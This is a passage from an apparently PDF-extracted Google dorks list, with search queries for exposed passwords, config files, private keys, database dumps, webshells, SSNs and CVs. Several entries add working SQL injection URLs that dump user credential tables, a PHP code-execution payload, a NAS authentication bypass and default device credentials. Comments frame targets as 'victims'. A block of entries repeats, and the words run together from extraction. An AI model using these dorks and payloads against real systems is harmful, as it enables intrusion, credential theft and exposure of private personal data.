
inurl:":9000"PacketVideocorporation

inurl:":9000" PacketVideocorporation

inurl:":9000" PacketVideo corporationAbout: This provides Twonky ServerMedia interface. You can find images,music, videos etc. Submitter: Ishaan P

intitle:m1n1 1.01 intitle:m1n1 1.01 find the b374k shell.... Submitted by :biLLbud

filetype:pem"Microsoft" filetype:pem "Microsoft"

Microsoft private keys, frequently usedfor servers with UserID on the samepage. -- Shamanoid

intitle:"vtigerCRM 5 -Commercial OpenSource CRM"

intitle:"vtiger CRM 5 - CommercialOpen Source CRM"

vtiger CRM version 5.x presence --LiquidWorm

allinurl:forcedownload.php?file= allinurl:forcedownload.php?file=

Didn't see this anywhere in the GHDB,but its been known for a while andwidely abused by others. Google Dork"allinurl:forcedownload.php?file="Sites that use the forcedownload.phpscript are vulnerable to urlmanipulation, and will spit out any fileon the local site, including the PHPfiles themselves with all server sidecode, not the rendered page, but thesource itself. This is most commonlyused on wordpress sites to grab the wp-config.php file to gain access to thedatabase, but is not limited towordpress sites. I only list it as an

Page 445: Packetstorm Google Dorks List

example, so people understand theweight of flaw. - DigiP

filetype:ini"Bootstrap.php"(pass|passwd|password|pwd)

filetype:ini "Bootstrap.php"(pass|passwd|password|pwd)

Zend application ini, with usernames,passwords and db info love Bastich

"Powered bySLAED CMS" "Powered by SLAED CMS"

Exploit Title: Slaed CMS Code execOn different versions of this softwarenext vulnerabilities are availible:/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view OR:/search.html?mod=&word={${phpinfo()}}&query=ok&to=view/search.html?mod=&word=ok&query={${phpinfo()}}&to=view

inurl:ftp"password"filetype:xls

inurl:ftp "password" filetype:xlsthis string may be used to find manylow hanging fruit on FTP sites recentlyindexed by google. Author: Uhaba

inurl:view.php?board1_sn= inurl:view.php?board1_sn= locates a webapp vulnerable to SQL

injectioninurl:"amfphp/browser/servicebrowser.swf"

inurl:"amfphp/browser/servicebrowser.swf"

AMFPHP service browser, debuginterface. Author: syddd

intitle:#k4raeL -sh3LL intitle:#k4raeL - sh3LL

intitle:#k4raeL - sh3LL Finds K4raelShell , though many of them are deadbut we can get some and even cachedata can get you information , makingwebsite vulnerable Author:cyb3r.pr3dat0r

filetype:php~(pass|passwd|password|dbpass|db_pass|pwd)

filetype:php~(pass|passwd|password|dbpass|db_pass|pwd)

Backup or temp versions of php filescontaining you guessed it passwords orother ripe for the picking info...Author: Bastich

inurl:"trace.axd"ext:axd"ApplicationTrace"

inurl:"trace.axd" ext:axd"Application Trace"

example google dork to find trace.axd,a file used for debugging asp thatreveals full http request details likecookie and other data that in manycases can be used to hijack user-sessions, display plain-text

Page 446: Packetstorm Google Dorks List

usernames/passwords and alsoserverinfo like pathnames second withplain-text usernames and passwordsalong with sessiondata. this file shouldbe developer-only and not publiclyavailable but seems to be used quiteoften, usually hidden from google withrobots.txt. Author: easypwn

inurl:"/includes/config.php" inurl:"/includes/config.php"

The Dork Allows you to get data baseinformation from config files. Author:XeNon

intitle:index.of?configuration.php.zip

intitle:index.of?configuration.php.zip

this dork finds mostly backed upconfiguration.php files. Its possible tochange the *.zip to *.txt or other filetypes. Author: Lord.TMR

inurl:"/ApplicationData/Filezilla/*"ORinurl:"/AppData/Filezilla/*"filetype:xml

inurl:"/Application Data/Filezilla/*"OR inurl:"/AppData/Filezilla/*"filetype:xml

this dork locates files containing ftppasswords

filetype:reg regHKEY_CURRENT_USERSSHHOSTKEYS

filetype:reg regHKEY_CURRENT_USERSSHHOSTKEYS

this dork locates registry dumps

inurl:phpintitle:"Cpanel ,FTP CraCkeR"

inurl:php intitle:"Cpanel , FTPCraCkeR"

locates cpanel and ftp cracker. Author:alsa7r

filetype:old(define)(DB_USER|DB_PASS|DB_NAME)

filetype:old(define)(DB_USER|DB_PASS|DB_NAME)

this dork locates backed up config filesfiletype:php~(define)(DB_USER|DB_PASS|DB_NAME) filetype:inc~(define)(DB_USER|DB_PASS|DB_NAME) filetype:inc(define)(DB_USER|DB_PASS|DB_NAME) filetype:bak(define)(DB_USER|DB_PASS|DB_NAME) Author: Gerald J. Pottier III

filetype:old(mysql_connect) () filetype:old (mysql_connect) ()

There are three of mysql_connects butthat all search in .inc or warnings, nonsearch for .old . Dot old is somethingthat all devs to to hide old files they donot want to delete immediatly butalmost always forget to delete. The

Page 447: Packetstorm Google Dorks List

server lang can be changed. :D --Gerald J. Pottier III Senior ManagedSystems Engineer :STG inc. Hereford,AZ 85615 [Home] 520.843.0135[Work] 520.538.9684

filetype:phpinanchor:c99inurl:c99intitle:c99shell -seeds -marijuana

filetype:php inanchor:c99 inurl:c99intitle:c99shell -seeds -marijuana

This search attempts to find the c99backdoor that may be knowingly orunknowingly installed on servers. Ihave refined the search in hopes thatmore general talk about the backdoor,and also talk about the marijuana straindoes not pollute the results quite asmuch. Author: Teague Newman

filetype:phpinurl:tiki-index.php +sirius+1.9.*

filetype:php inurl:tiki-index.php+sirius +1.9.*

Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones

allintitle:"UniMepStation Controller"

allintitle:"UniMep StationController"

UniMep is a device for managing fuelstation. You can see process of fuelingcars and you can make some changesin the setting. The defaultusername/password is admin/setup.Author: WBR rigan

inurl:/cgi-bin/makecgi-pro inurl:/cgi-bin/makecgi-pro

Brings up listings for Iomgea NASdevices. Password protected folders aresusceptible to authentication bypass byadding the following to the url (after/cgi-bin/make-cgi-pro):?page_value=page_files&tab_value=%20&task_value=task_gotoPath¶m1_value=(foldername) Common folders aremusic, movies, photos & public.Author: Matt Jones

"My RoboFormData" "index of" "My RoboForm Data" "index of"

This dork looks for Roboformpassword files. Author: RobertMcCurdy

filetype:sqlinurl:wp-content/backup-*

filetype:sql inurl:wp-content/backup-*

Search for WordPress MySQLdatabase backup. Author: AngelParrot

Google Dork ForSocial SecurityNumber ( In Spainand Argentina isD.N.I )

Google Dork For Social SecurityNumber ( In Spain and Argentina isD.N.I )

This dork locates social securitynumbers. Author: Luciano UNLP

Page 448: Packetstorm Google Dorks List

Google Dorkinurl:CurriculumVitale filetype:doc( VitalInformaticon ,Addres, TelephoneNumer, SSN , FullName, Work , etc )In Spanish.

Google Dork inurl:CurriculumVitale filetype:doc ( VitalInformaticon , Addres, TelephoneNumer, SSN , Full Name, Work ,etc ) In Spanish.

This dork locates Curriculum Vitalefiles. Author: Luciano UNLP

Microsoft-IIS/7.0intitle:index.ofname size

Microsoft-IIS/7.0 intitle:index.ofname size IIS 7 directory listing. Author: huang

List of PhoneNumbers (In XLSFile )allinurl:telefonosfiletype:xls

List of Phone Numbers (In XLSFile ) allinurl:telefonos filetype:xls

This is a dork for a list of PhonePrivate Numbers in Argentina. Author:Luciano UNLP

inurl:.php intitle:-BOFF 1.0 intext:[Sec. Info ]

inurl:.php intitle:- BOFF 1.0 intext:[Sec. Info ]

This search attempts to find the BOFF1.0 Shell. Author: alsa7r

intitle:SpectraIV-IP intitle:SpectraIV-IP

Google dork for pelco SpectraIV-IPDome Series cameras Defaultusername/password "admin/admin".Author: GhOsT-PR

allintext:D.N.Ifiletype:xls allintext:D.N.I filetype:xls

This Query contains sensitive data(D.N.I ;-) ) in a xls format (excel) andD.N.I for People of the Anses ! Author:Luciano UNLP

(username=* |username:* |) | (((password=* |password:*) |(passwd=* |passwd:*) |(credentials=* |credentials:*)) |((hash=* | hash:*) |(md5:* | md5=*)) |(inurl:auth |inurl:passwd |inurl:pass) )filetype:log

(username=* | username:* |) | (((password=* | password:*) |(passwd=* | passwd:*) |(credentials=* | credentials:*)) |((hash=* | hash:*) | (md5:* |md5=*)) | (inurl:auth | inurl:passwd| inurl:pass) ) filetype:log

Logged username, passwords, hashesAuthor: GhOsT-PR

inurl:RgFirewallRL.asp |

inurl:RgFirewallRL.asp |inurl:RgDmzHost.asp | Gateway Routers Author: GhOsT-PR

Page 449: Packetstorm Google Dorks List

inurl:RgDmzHost.asp |inurl:RgMacFiltering.asp |inurl:RgConnect.asp |inurl:RgEventLog.asp |inurl:RgSecurity.asp |inurl:RgContentFilter.asp |inurl:wlanRadio.asp

inurl:RgMacFiltering.asp |inurl:RgConnect.asp |inurl:RgEventLog.asp |inurl:RgSecurity.asp |inurl:RgContentFilter.asp |inurl:wlanRadio.asp

inurl:cgi-bin/cosmobdf.cgi? inurl:cgi-bin/cosmobdf.cgi? COSMOView for building

management. Author: GhOsT-PRinurl:"/showPlayer.php?id="intext:"powered byellistonSPORT"

inurl:"/showPlayer.php?id="intext:"powered by ellistonSPORT"

ellistonSPORT Remote SQL InjectionVulnerability. Author: ITTIHACK

inurl:wp-content/plugins/age-verification/age-verification.php

inurl:wp-content/plugins/age-verification/age-verification.php

Wordpress Age Verification Pluginhttp://www.exploit-db.com/exploits/18350

intitle:"HtmlAnvView:D7B039C1" intitle:"HtmlAnvView:D7B039C1"

This dork finds WirelessSecurity/Webcams that are accessiblefrom the web. The interesting part isthat for some reason these cameras donot generally allow users toremove/change the defaultadministrative username and pass. Soin most cases you can view any camerathat shows up in the google search.Default Username: admin01 DefaultPassword: 000000 111111 999999Author: Paul White

intext:"~~Joomla1.txt" title:"Index of/"

intext:"~~Joomla1.txt" title:"Indexof /"

intext:"~~Joomla1.txt" title:"Index of /"Get all server configs files Discoveredby alsa7r

"Welcome toSitecore" +"License Holder"

"Welcome to Sitecore" + "LicenseHolder" Sitecore CMS detection.

intitle:"-N3t"filetype:php

intitle:"-N3t" filetype:phpundetectable

intitle:"-N3t" filetype:php undetectableSearch WebShell indexed on a page. --

Page 450: Packetstorm Google Dorks List

undetectable Joel Campusano Rojas. 632 161 62@joelcampusano Ingeniero Civil enInformtica.

?intitle:index.of?".mysql_history" ?intitle:index.of?".mysql_history" Find some juicy info in .mysql_history

files enjoy bastich

intitle:awen+intitle:asp.net intitle:awen+intitle:asp.net

Hi, This google dork exposes anyalready uploaded asp.net shells whichare available in BackTrack.http://www.google.com/search?q=intitle:awen+intitle:asp.net Thanks, SagarBelure

"mailing listmembershipsreminder"

"mailing list membershipsreminder"

Hi, By default, while subscribing to amailing list on a website, runningMailman (GNU) for mailing listmanagement, the user has got optionsto manage his/her subscription options.There is an option of getting passwordreminder email for this list once in amonth. And, by default, this option isset to Yes. Along with sending thepassword reminder mail in *plain text*to the users, it gets archived on the sitestoo. Thanks, Sagar Belure

intext:"Thank youfor yourpurchase/trial ofALWIL Softwareproducts.:"

intext:"Thank you for yourpurchase/trial of ALWIL Softwareproducts.:"

This dork can fetch you Avast productlicenses especially Avast Antiviruses ,including Professional editions ;)Author: gr00ve_hack3r www.gr00ve-hack3r.com

inurl:"tiki-index.php"filetype:php "Thisis TikiWiki 1.9"

inurl:"tiki-index.php" filetype:php"This is TikiWiki 1.9"

The server vulnerable to => CVE2006-4602

filetype:cfg"radius"(pass|passwd|password)

filetype:cfg "radius"(pass|passwd|password)

Find config files with radius configsand passwords and secrets... LoveBastich

inurl:Settings.aspxintitle:Beyond TV

inurl:Settings.aspx intitle:BeyondTV

Beyond TV gives you the capability toturn your PC into a high quality, digitalvideo recorder (DVR). Most people useit for cable TV so that they don't haveto spend rent money on a low endquality hardware DVR from their cablecompany. It's default config has nopassword or username enabled. Very

Page 451: Packetstorm Google Dorks List

bad for people who connect their PCsdirectly to their modems. I haveBeyond TV and I was curious on howsecure it is.

inurl:"cgi-bin/webcgi/main" inurl:"cgi-bin/webcgi/main"

inurl:"cgi-bin/webcgi/main" This dorkfinds indexed public facing DellRemote Access Card. -n17r0u6

inurl:"phpmyadmin/index.php"intext:"[ Edit ] [Create PHP Code ][ Refresh ]"

inurl:"phpmyadmin/index.php"intext:"[ Edit ] [ Create PHP Code ][ Refresh ]"

This dork finds unsecured databases

inurl:"passes" ORinurl:"passwords"ORinurl:"credentials"-search -download-techsupt -git -games -gz -bypass-exe filetype:[email protected] OR@gmail OR@hotmail OR@rediff

inurl:"passes" OR inurl:"passwords"OR inurl:"credentials" -search -download -techsupt -git -games -gz-bypass -exe filetype:[email protected] OR @gmail OR@hotmail OR @rediff

Hack the $cr1pt kiddies. There are a lotof Phishing pages hosted on internet ,this dork will provide you with theirpassword files. Clean and Simplegr00ve_hack3rwww.gr00vehack3r.wordpress.com

filetype:docxDomain Registrar$user $pass

filetype:docx Domain Registrar$user $pass

Dork :- *filetype:docx DomainRegistrar $user $pass* Use :- *To finddomain login password for Registrar(can Hijack Domain) Submitted by :G00g!3 W@rr!0r *

inurl:/app_dev.php/login"Environment"

inurl:/app_dev.php/login"Environment"

Search for login screen in webaplications developed with Symfony2in a development environment DanielMaldonadohttp://caceriadespammers.com.ar

inurl:imageview5 inurl:imageview5

Imageview 5 (Cookie/index.php)Remote Local Include - CVE: 2006-5554: http://www.exploit-db.com/exploits/2647

"This site ispowered by e107" "This site is powered by e107"

TikiWiki 1.9 Sirius (jhot.php) RemoteCommand Execution - CVE: 2006-4602: http://www.exploit-db.com/exploits/2711

"powered by "powered by tikiwiki" TikiWiki 1.9 Sirius (jhot.php) Remote

Page 452: Packetstorm Google Dorks List

tikiwiki" Command Execution - CVE: 2006-4602: http://www.exploit-db.com/exploits/2288

intitle:"X7 ChatHelpCenter"|"PoweredBy X7 Chat"

intitle:"X7 Chat HelpCenter"|"Powered By X7 Chat"

X7 Chat 2.0 (help_file) RemoteCommands Execution - CVE: 2006-2156: http://www.exploit-db.com/exploits/1738

"powered bygcards" "powered by gcards"

gCards 1.45 Multiple Vulnerabilities -CVE: 2006-1346: http://www.exploit-db.com/exploits/1595

pixelpost "RSS2.0" "ATOM feed""Valid xHTML /Valid CSS"

pixelpost "RSS 2.0" "ATOM feed""Valid xHTML / Valid CSS"

Pixelpost 1-5rc1-2 Remote PrivilegeEscalation Exploit - CVE: 2006-2889:http://www.exploit-db.com/exploits/1868

"This web site wasmade with MD-Pro"

"This web site was made with MD-Pro"

CVE: 2006-7112 EDB-ID: 2712 Thissearch can potentially identifyvulnerable installations of MD-Pro, aweb portal system written in PHP.

"Powered byXMB"

http://www.google.com/search?q="Powered+by+XMB"

CVE: 2006-3994 EDB-ID: 2105 Thissearch can potentially identifyvulnerable installations of XMB

"powered byThWboard" "powered by ThWboard"

CVE: 2007-0340 EDB-ID: 3124 Thissearch can potentially identifyvulnerable installations of ThWboard.

"Page created in""seconds byglFusion" +RSS

"Page created in" "seconds byglFusion" +RSS

CVE: 2009-1281 EDB-ID: 8347 Thissearch can potentially identifyvulnerable installations of glFusion.http://www.exploit-db.com/exploits/8347

inurl:wp-login.phpRegister UsernamePassword -echo

inurl:wp-login.php RegisterUsername Password -echo

CVE: 2006-2667 EDB-ID: 6 Thissearch can potentially identifyvulnerable installations of WordPress.

intext:"Poweredby OnePlug CMS" intext:"Powered by OnePlug CMS"

Sumitter: p0pc0rn SQL Injection:http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a

intitle:"[EasyPHP]- Administration"

intitle:"[EasyPHP] -Administration"

Unprotected EasyPHP Admin pagedetection.. Author: Aneesh Dogra(lionaneesh)

intext:"Poweredby Inventory MojoSoftware."

intext:"Powered by Inventory MojoSoftware."

Submitter: p0pc0rn SQL Injection(categoria.asp, producto.asp,srubro.asp, marca.asp, buscar.asp,Login.asp, NewUser.asp,

Page 453: Packetstorm Google Dorks List

do_addToNewsletter.asp) ---http://site.com/categoria.asp?CT=6' and'1'='1 TRUEhttp://site.com/categoria.asp?CT=6' and'1'='0 FALSE

"site byDesignscope" "site by Designscope"

Submitter: Net.Edit0r SQL Injection:http://127.0.0.1/general.php?pageID=[SQL]http://127.0.0.1/content.php?pageID=[SQL]

index.php?option=com_ignitegallery

index.php?option=com_ignitegallery

Submitter: TiGeR_YeMeN HaCkErSQL Injection:index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--

intext:"Poweredby FXRecruiter" intext:"Powered by FXRecruiter"

Submitter: Ashiyane Digital SecurityTeam Arbitrary File Upload: You mustRegister at site, Then in "Upload CVField" Select and Upload Your File,then Using "Live Http Header" Changeur File Format To Etc Uploaded path:http://127.0.0.1/fxmodules/resumes/[Your File]

inurl:"fbconnect_action=myhome" inurl:"fbconnect_action=myhome"

Submitter: z0mbyak SQL Injection:www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

filetype:ini"pdo_mysql"(pass|passwd|password|pwd)

filetype:ini "pdo_mysql"(pass|passwd|password|pwd)

full details dbname dbuser dbpass allplain text Author:Bastich

filetype:ini"SavedPasswords"(pass|passwd|password|pwd)

filetype:ini "SavedPasswords"(pass|passwd|password|pwd)

Unreal Tournament config, plain textpasswords Author: Bastich

filetype:ini"precurio"(pass|passwd|password|pwd)

filetype:ini "precurio"(pass|passwd|password|pwd) plain text passwods

Page 454: Packetstorm Google Dorks List

filetype:ini"FtpInBackground"(pass|passwd|password|pwd)

filetype:ini "FtpInBackground"(pass|passwd|password|pwd)

Total commander wxc_ftp.ini run hasthrough John etc. or even better usehttp://wcxftp.org.ru/

filetype:ini"[FFFTP]"(pass|passwd|password|pwd)

filetype:ini "[FFFTP]"(pass|passwd|password|pwd)

Asian FTP software -, run the passwordhash through John etc. Author: Bastich

"error_log"inurl:/wp-content "error_log" inurl:/wp-content

Find various www readable Wordpressdirectories containing error logs withserver side debugging info, such ashome path directory names, which areoften the same user names for logginginto the server over FTP and SSH. Thisoften exposes the path of the plug-insinstalled in wordpress as well, givingsomeone more information andavenues of attack since manyWordpress plug-ins can lead tocompromises of the sites security. -DigiP

allinurl:http://www.google.co.in/latitude/apps/badge/api?user=

allinurl:http://www.google.co.in/latitude/apps/badge/api?user=

Site: google.com/latitude - This is afree application where you can trackyour PC, laptop and mobile, just loginthere and you will be trackedfreely(used to track yourself live andyou can put this in blogs to show whereyou are) I made a dork simply thatshows some couple of people, aftersome years when this application willgrow stronger and you can get tons ofvictims.*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=* By *TheALLSTAR*

intitle:Locus7shellintext:"Software:"

intitle:Locus7shellintext:"Software:"

intitle:Locus7shell intext:"Software:"Submitted by lionaneesh -- ThanksAneesh Dogra (lionaneesh)

filetype:xls +password +inurl:.com

filetype:xls + password + inurl:.com

The filetype:xls never changes What isinbtween then + sings can be what everyou are looking for taxid ssn passwordStudent ID etc The inurl: can bechanged to what you want .gov .edu

Page 455: Packetstorm Google Dorks List

.com etc. Take care, RedShift"Login Name"RepositoryWebtopintitle:login

"Login Name" Repository Webtopintitle:login

Search for login screen of defaultinstance: Documentum Webtop byEMC

intitle:"EnablingSelf-ServiceProcurement"

intitle:"Enabling Self-ServiceProcurement"

Search for login screen of defaultinstance: Puridiom (A ProcurementWeb Application)

intitle:"cyberrecruiter" "UserID"

intitle:"cyber recruiter" "User ID"Search for login screen of defaultinstance: Cyber Recruiter (applicanttracking and recruiting software)

inurl:sarginurl:siteuser.html inurl:sarg inurl:siteuser.html

Submitter: pipefish Squid User AccessReports that show users' browsinghistory through the proxy. Showsinternal IP space sometimes, usernamesas well, and can be helpful whenplanning a pen test (spearphishing\social engineering campaignetc.) It also helps to ID anorganization's proxy server.

vBulletin InstallPage Detection vBulletin Install Page Detection

inurl:/install/install.phpintitle:vBulletin * Install System Thisdork displays the untreated install.phppages! Auth0r: lionaneesh Greetz to:Team Indishell , INDIA , AasimShaikh ,

ionCube LoaderWizardinformationdisclosure

ionCube Loader Wizardinformation disclosure

inurl:loader-wizard ext:php This dorkdisplays sensitive information Auth0r:MaXe

inurl:"clsUploadtest.asp" inurl:"clsUploadtest.asp"

Submitter: KDGCrewhttp://www.site.com/clsUpload/clsUploadtest.asphttp://www.site.com/clsUpload/nameshell.php

filetype:sql"PostgreSQLdatabase dump"(pass|password|passwd|pwd)

filetype:sql "PostgreSQL databasedump" (pass|password|passwd|pwd)

PostgreSQL database dump withpasswords Bastich

filetype:sql"MySQL dump"(pass|password|pas

filetype:sql "MySQL dump"(pass|password|passwd|pwd)

MySQL database dump withpasswords Bastich

Page 456: Packetstorm Google Dorks List

swd|pwd)filetype:sql"phpmyAdminSQL Dump"(pass|password|passwd|pwd)

filetype:sql "phpmyAdmin SQLDump" (pass|password|passwd|pwd)

phpMyAdmin SQL dump withpasswords Bastich

site:dl.dropbox.com filetype:pdf cvOR curriculumvitae OR resume

site:dl.dropbox.com filetype:pdf cvOR curriculum vitae OR resume

Searches Dropbox for publiclyavaliable PDF's containing informationused in a CV/Resume/CurriculumVitae which can therefore be used in aSocial Engineering based vector attack.Author: Trevor Starick

site:docs.google.com intitle:(cv Orresume ORcurriculum vitae)

site:docs.google.com intitle:(cv Orresume OR curriculum vitae)

Searches GoogleDocs for publiclyavaliable PDF's containing informationused in a CV/Resume/CurriculumVitae which can therefore be used in aSocial Engineering based vector attack.-- Trevor Starick

site:mediafire.comcv Or resume ORcurriculum vitaefiletype:pdf ORdoc

site:mediafire.com cv Or resumeOR curriculum vitae filetype:pdfOR doc

Searches Mediafire for publiclyavaliable PDF's containing informationused in a CV/Resume/CurriculumVitae which can therefore be used in aSocial Engineering based vector attack-- Trevor Starick

site:stashbox.orgcv Or resume ORcurriculum vitaefiletype:pdf ORdoc

site:stashbox.org cv Or resume ORcurriculum vitae filetype:pdf ORdoc

Searches StashBox for publiclyavaliable PDF's or .doc files containinginformation used in aCV/Resume/Curriculum Vitae whichcan therefore be used in a SocialEngineering based vector attack --Trevor Starick

inurl:/push/ .pemapns -"pushnotifications" "bagattributes"

inurl:/push/ .pem apns -"pushnotifications" "bag attributes"

iphone apple push notification systemprivate keys, frequently unencrypted,frequently with DeviceIDs in same dir

inurl:server-infointitle:"ServerInformation"Apache ServerInformation

inurl:server-info intitle:"ServerInformation" Apache ServerInformation

Juicy information about the apacheserver installation in the website. --*Regards, Fady Mohammed Osman.*

inurl:":9000"PacketVideocorporation

inurl:":9000" PacketVideocorporation

inurl:":9000" PacketVideo corporationAbout: This provides Twonky ServerMedia interface. You can find images,

Page 457: Packetstorm Google Dorks List

music, videos etc. Submitter: Ishaan P

intitle:m1n1 1.01 intitle:m1n1 1.01 find the b374k shell.... Submitted by :biLLbud

filetype:pem"Microsoft" filetype:pem "Microsoft"

Microsoft private keys, frequently usedfor servers with UserID on the samepage. -- Shamanoid

intitle:"vtigerCRM 5 -Commercial OpenSource CRM"

intitle:"vtiger CRM 5 - CommercialOpen Source CRM"

vtiger CRM version 5.x presence --LiquidWorm

allinurl:forcedownload.php?file= allinurl:forcedownload.php?file=

Didn't see this anywhere in the GHDB,but its been known for a while andwidely abused by others. Google Dork"allinurl:forcedownload.php?file="Sites that use the forcedownload.phpscript are vulnerable to urlmanipulation, and will spit out any fileon the local site, including the PHPfiles themselves with all server sidecode, not the rendered page, but thesource itself. This is most commonlyused on wordpress sites to grab the wp-config.php file to gain access to thedatabase, but is not limited towordpress sites. I only list it as anexample, so people understand theweight of flaw. - DigiP

filetype:ini"Bootstrap.php"(pass|passwd|password|pwd)

filetype:ini "Bootstrap.php"(pass|passwd|password|pwd)

Zend application ini, with usernames,passwords and db info love Bastich

"Powered bySLAED CMS" "Powered by SLAED CMS"

Exploit Title: Slaed CMS Code execOn different versions of this softwarenext vulnerabilities are availible:/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view OR:/search.html?mod=&word={${phpinfo()}}&query=ok&to=view/search.html?mod=&word=ok&query={${phpinfo()}}&to=view

Page 458: Packetstorm Google Dorks List

inurl:ftp"password"filetype:xls

inurl:ftp "password" filetype:xlsthis string may be used to find manylow hanging fruit on FTP sites recentlyindexed by google. Author: Uhaba

inurl:view.php?board1_sn= inurl:view.php?board1_sn= locates a webapp vulnerable to SQL

injectioninurl:"amfphp/browser/servicebrowser.swf"

inurl:"amfphp/browser/servicebrowser.swf"

AMFPHP service browser, debuginterface. Author: syddd

intitle:#k4raeL -sh3LL intitle:#k4raeL - sh3LL

intitle:#k4raeL - sh3LL Finds K4raelShell , though many of them are deadbut we can get some and even cachedata can get you information , makingwebsite vulnerable Author:cyb3r.pr3dat0r

filetype:php~(pass|passwd|password|dbpass|db_pass|pwd)

filetype:php~(pass|passwd|password|dbpass|db_pass|pwd)

Backup or temp versions of php filescontaining you guessed it passwords orother ripe for the picking info...Author: Bastich

inurl:"trace.axd"ext:axd"ApplicationTrace"

inurl:"trace.axd" ext:axd"Application Trace"

example google dork to find trace.axd,a file used for debugging asp thatreveals full http request details likecookie and other data that in manycases can be used to hijack user-sessions, display plain-textusernames/passwords and alsoserverinfo like pathnames second withplain-text usernames and passwordsalong with sessiondata. this file shouldbe developer-only and not publiclyavailable but seems to be used quiteoften, usually hidden from google withrobots.txt. Author: easypwn

inurl:"/includes/config.php" inurl:"/includes/config.php"

The Dork Allows you to get data baseinformation from config files. Author:XeNon

allintext: "Pleaselogin tocontinue..." "ZTECorporation. Allrights reserved."

allintext: "Please login tocontinue..." "ZTE Corporation. Allrights reserved."

Reported by: Jasper Briels

"index of"inurl:rootintitle:symlink

"index of" inurl:root intitle:symlinkGoogle Dork: index of" inurl:rootintitle:symlink Steal Others SymlinkAuthor: Un0wn_X

Page 459: Packetstorm Google Dorks List

"index of"inurl:sym "index of" inurl:sym

Google Dork: "index of" inurl:symYou can Steal the symlinks of otherServers Author: Un0wn_X

inurl:"php?id="intext:"DB_ErrorObject "

inurl:"php?id=" intext:"DB_ErrorObject "

Description: Files containing juicy infoAuthor:ruben_linux

inurl:advsearch.php?module= &intext:sql syntax

inurl:advsearch.php?module= &intext:sql syntax

Exploit Title : SQLI Exploit GoogleDork : inurl:advsearch.php?module= &intext:sql syntax Date : 19/3/2013Exploit Author : Scott Sturrock Email :f00bar'at'linuxmail'dot'org

intext:THIS IS APRIVATESYSTEMAUTHORISEDACCESS ONLYinurl:login.aspx

intext:THIS IS A PRIVATESYSTEM AUTHORISEDACCESS ONLY inurl:login.aspx

Category : Pages containing loginportals Description : Dork for findingsensitive login portals Dork :intext:THIS IS A PRIVATE SYSTEMAUTHORISED ACCESS ONLYinurl:login.aspx Link :https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 Date : 20/3/2013 Exploit Author:Scott Sturrock Email:f00bar'at'linuxmail'dot'org

intext:YOU AREACCESSING AGOVERNMENTINFORMATIONSYSTEMinurl:login.aspx

intext:YOU ARE ACCESSING AGOVERNMENT INFORMATIONSYSTEM inurl:login.aspx

Category : Pages containing loginportals Description : Dork for findinggovernment login portals Dork :intext:YOU ARE ACCESSING AGOVERNMENT INFORMATIONSYSTEM inurl:login.aspx Link :https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&oq=intext:YOU+ARE+ACCESSING+A

Page 460: Packetstorm Google Dorks List

+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 Date : 20/3/2013 Author : ScottSturrock Email:f00bar'at'linuxmail'dot'org

intext:ComputerMisuse Actinurl:login.aspx

intext:Computer Misuse Actinurl:login.aspx

Category : Pages containing loginportals Description : Dork for findingsensitive login portals Dork :intext:Computer Misuse Actinurl:login.aspx Link :https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.ZWU&fp=7b93b16efbccc178&biw=1362&bih=667 Date : 20/3/2013 Author : ScottSturrock Email:f00bar'at'linuxmail'dot'org

filetype:ini "Thisis the defaultsettings file fornew PHPinstallations"

filetype:ini "This is the defaultsettings file for new PHPinstallations"

Finds PHP configuration files (php.ini)that have been placed in indexedfolders. Php.ini defines a PHPinstallation's behavior, including magicquotes, register globals, and remote fileoperations. This can be useful forknowing which attacks (such as RFI)are possible against the server. - AndyG - twitter.com/vxhex

filetype:php -site:php.netintitle:phpinfo"published by thePHP Group"

filetype:php -site:php.netintitle:phpinfo "published by thePHP Group"

Tries to reduce false positive resultsfrom similar dorks. Finds pagescontaining output from phpinfo(). Thisfunction is used to debug and test PHPinstallations by listing versions,extensions, configurations, serverinformation, file system information,and execution environment. The output

Page 461: Packetstorm Google Dorks List

of this function should not be includedin production environments and certainversions of this function are vulnerableto reflected XSS attacks. - Andy G -twitter.com/vxhex

inurl:/voice/advanced/ intitle:LinksysSPA configuration

inurl:/voice/advanced/intitle:Linksys SPA configuration

This allows you to look at linksysVOIP Router Config pages.

inurl:"/root/etc/passwd"intext:"home/*:"

inurl:"/root/etc/passwd"intext:"home/*:"

inurl:"/root/etc/passwd"intext:"home/*:"

intext:"root:x:0:0:root:/root:/bin/bash"inurl:*=/etc/passwd

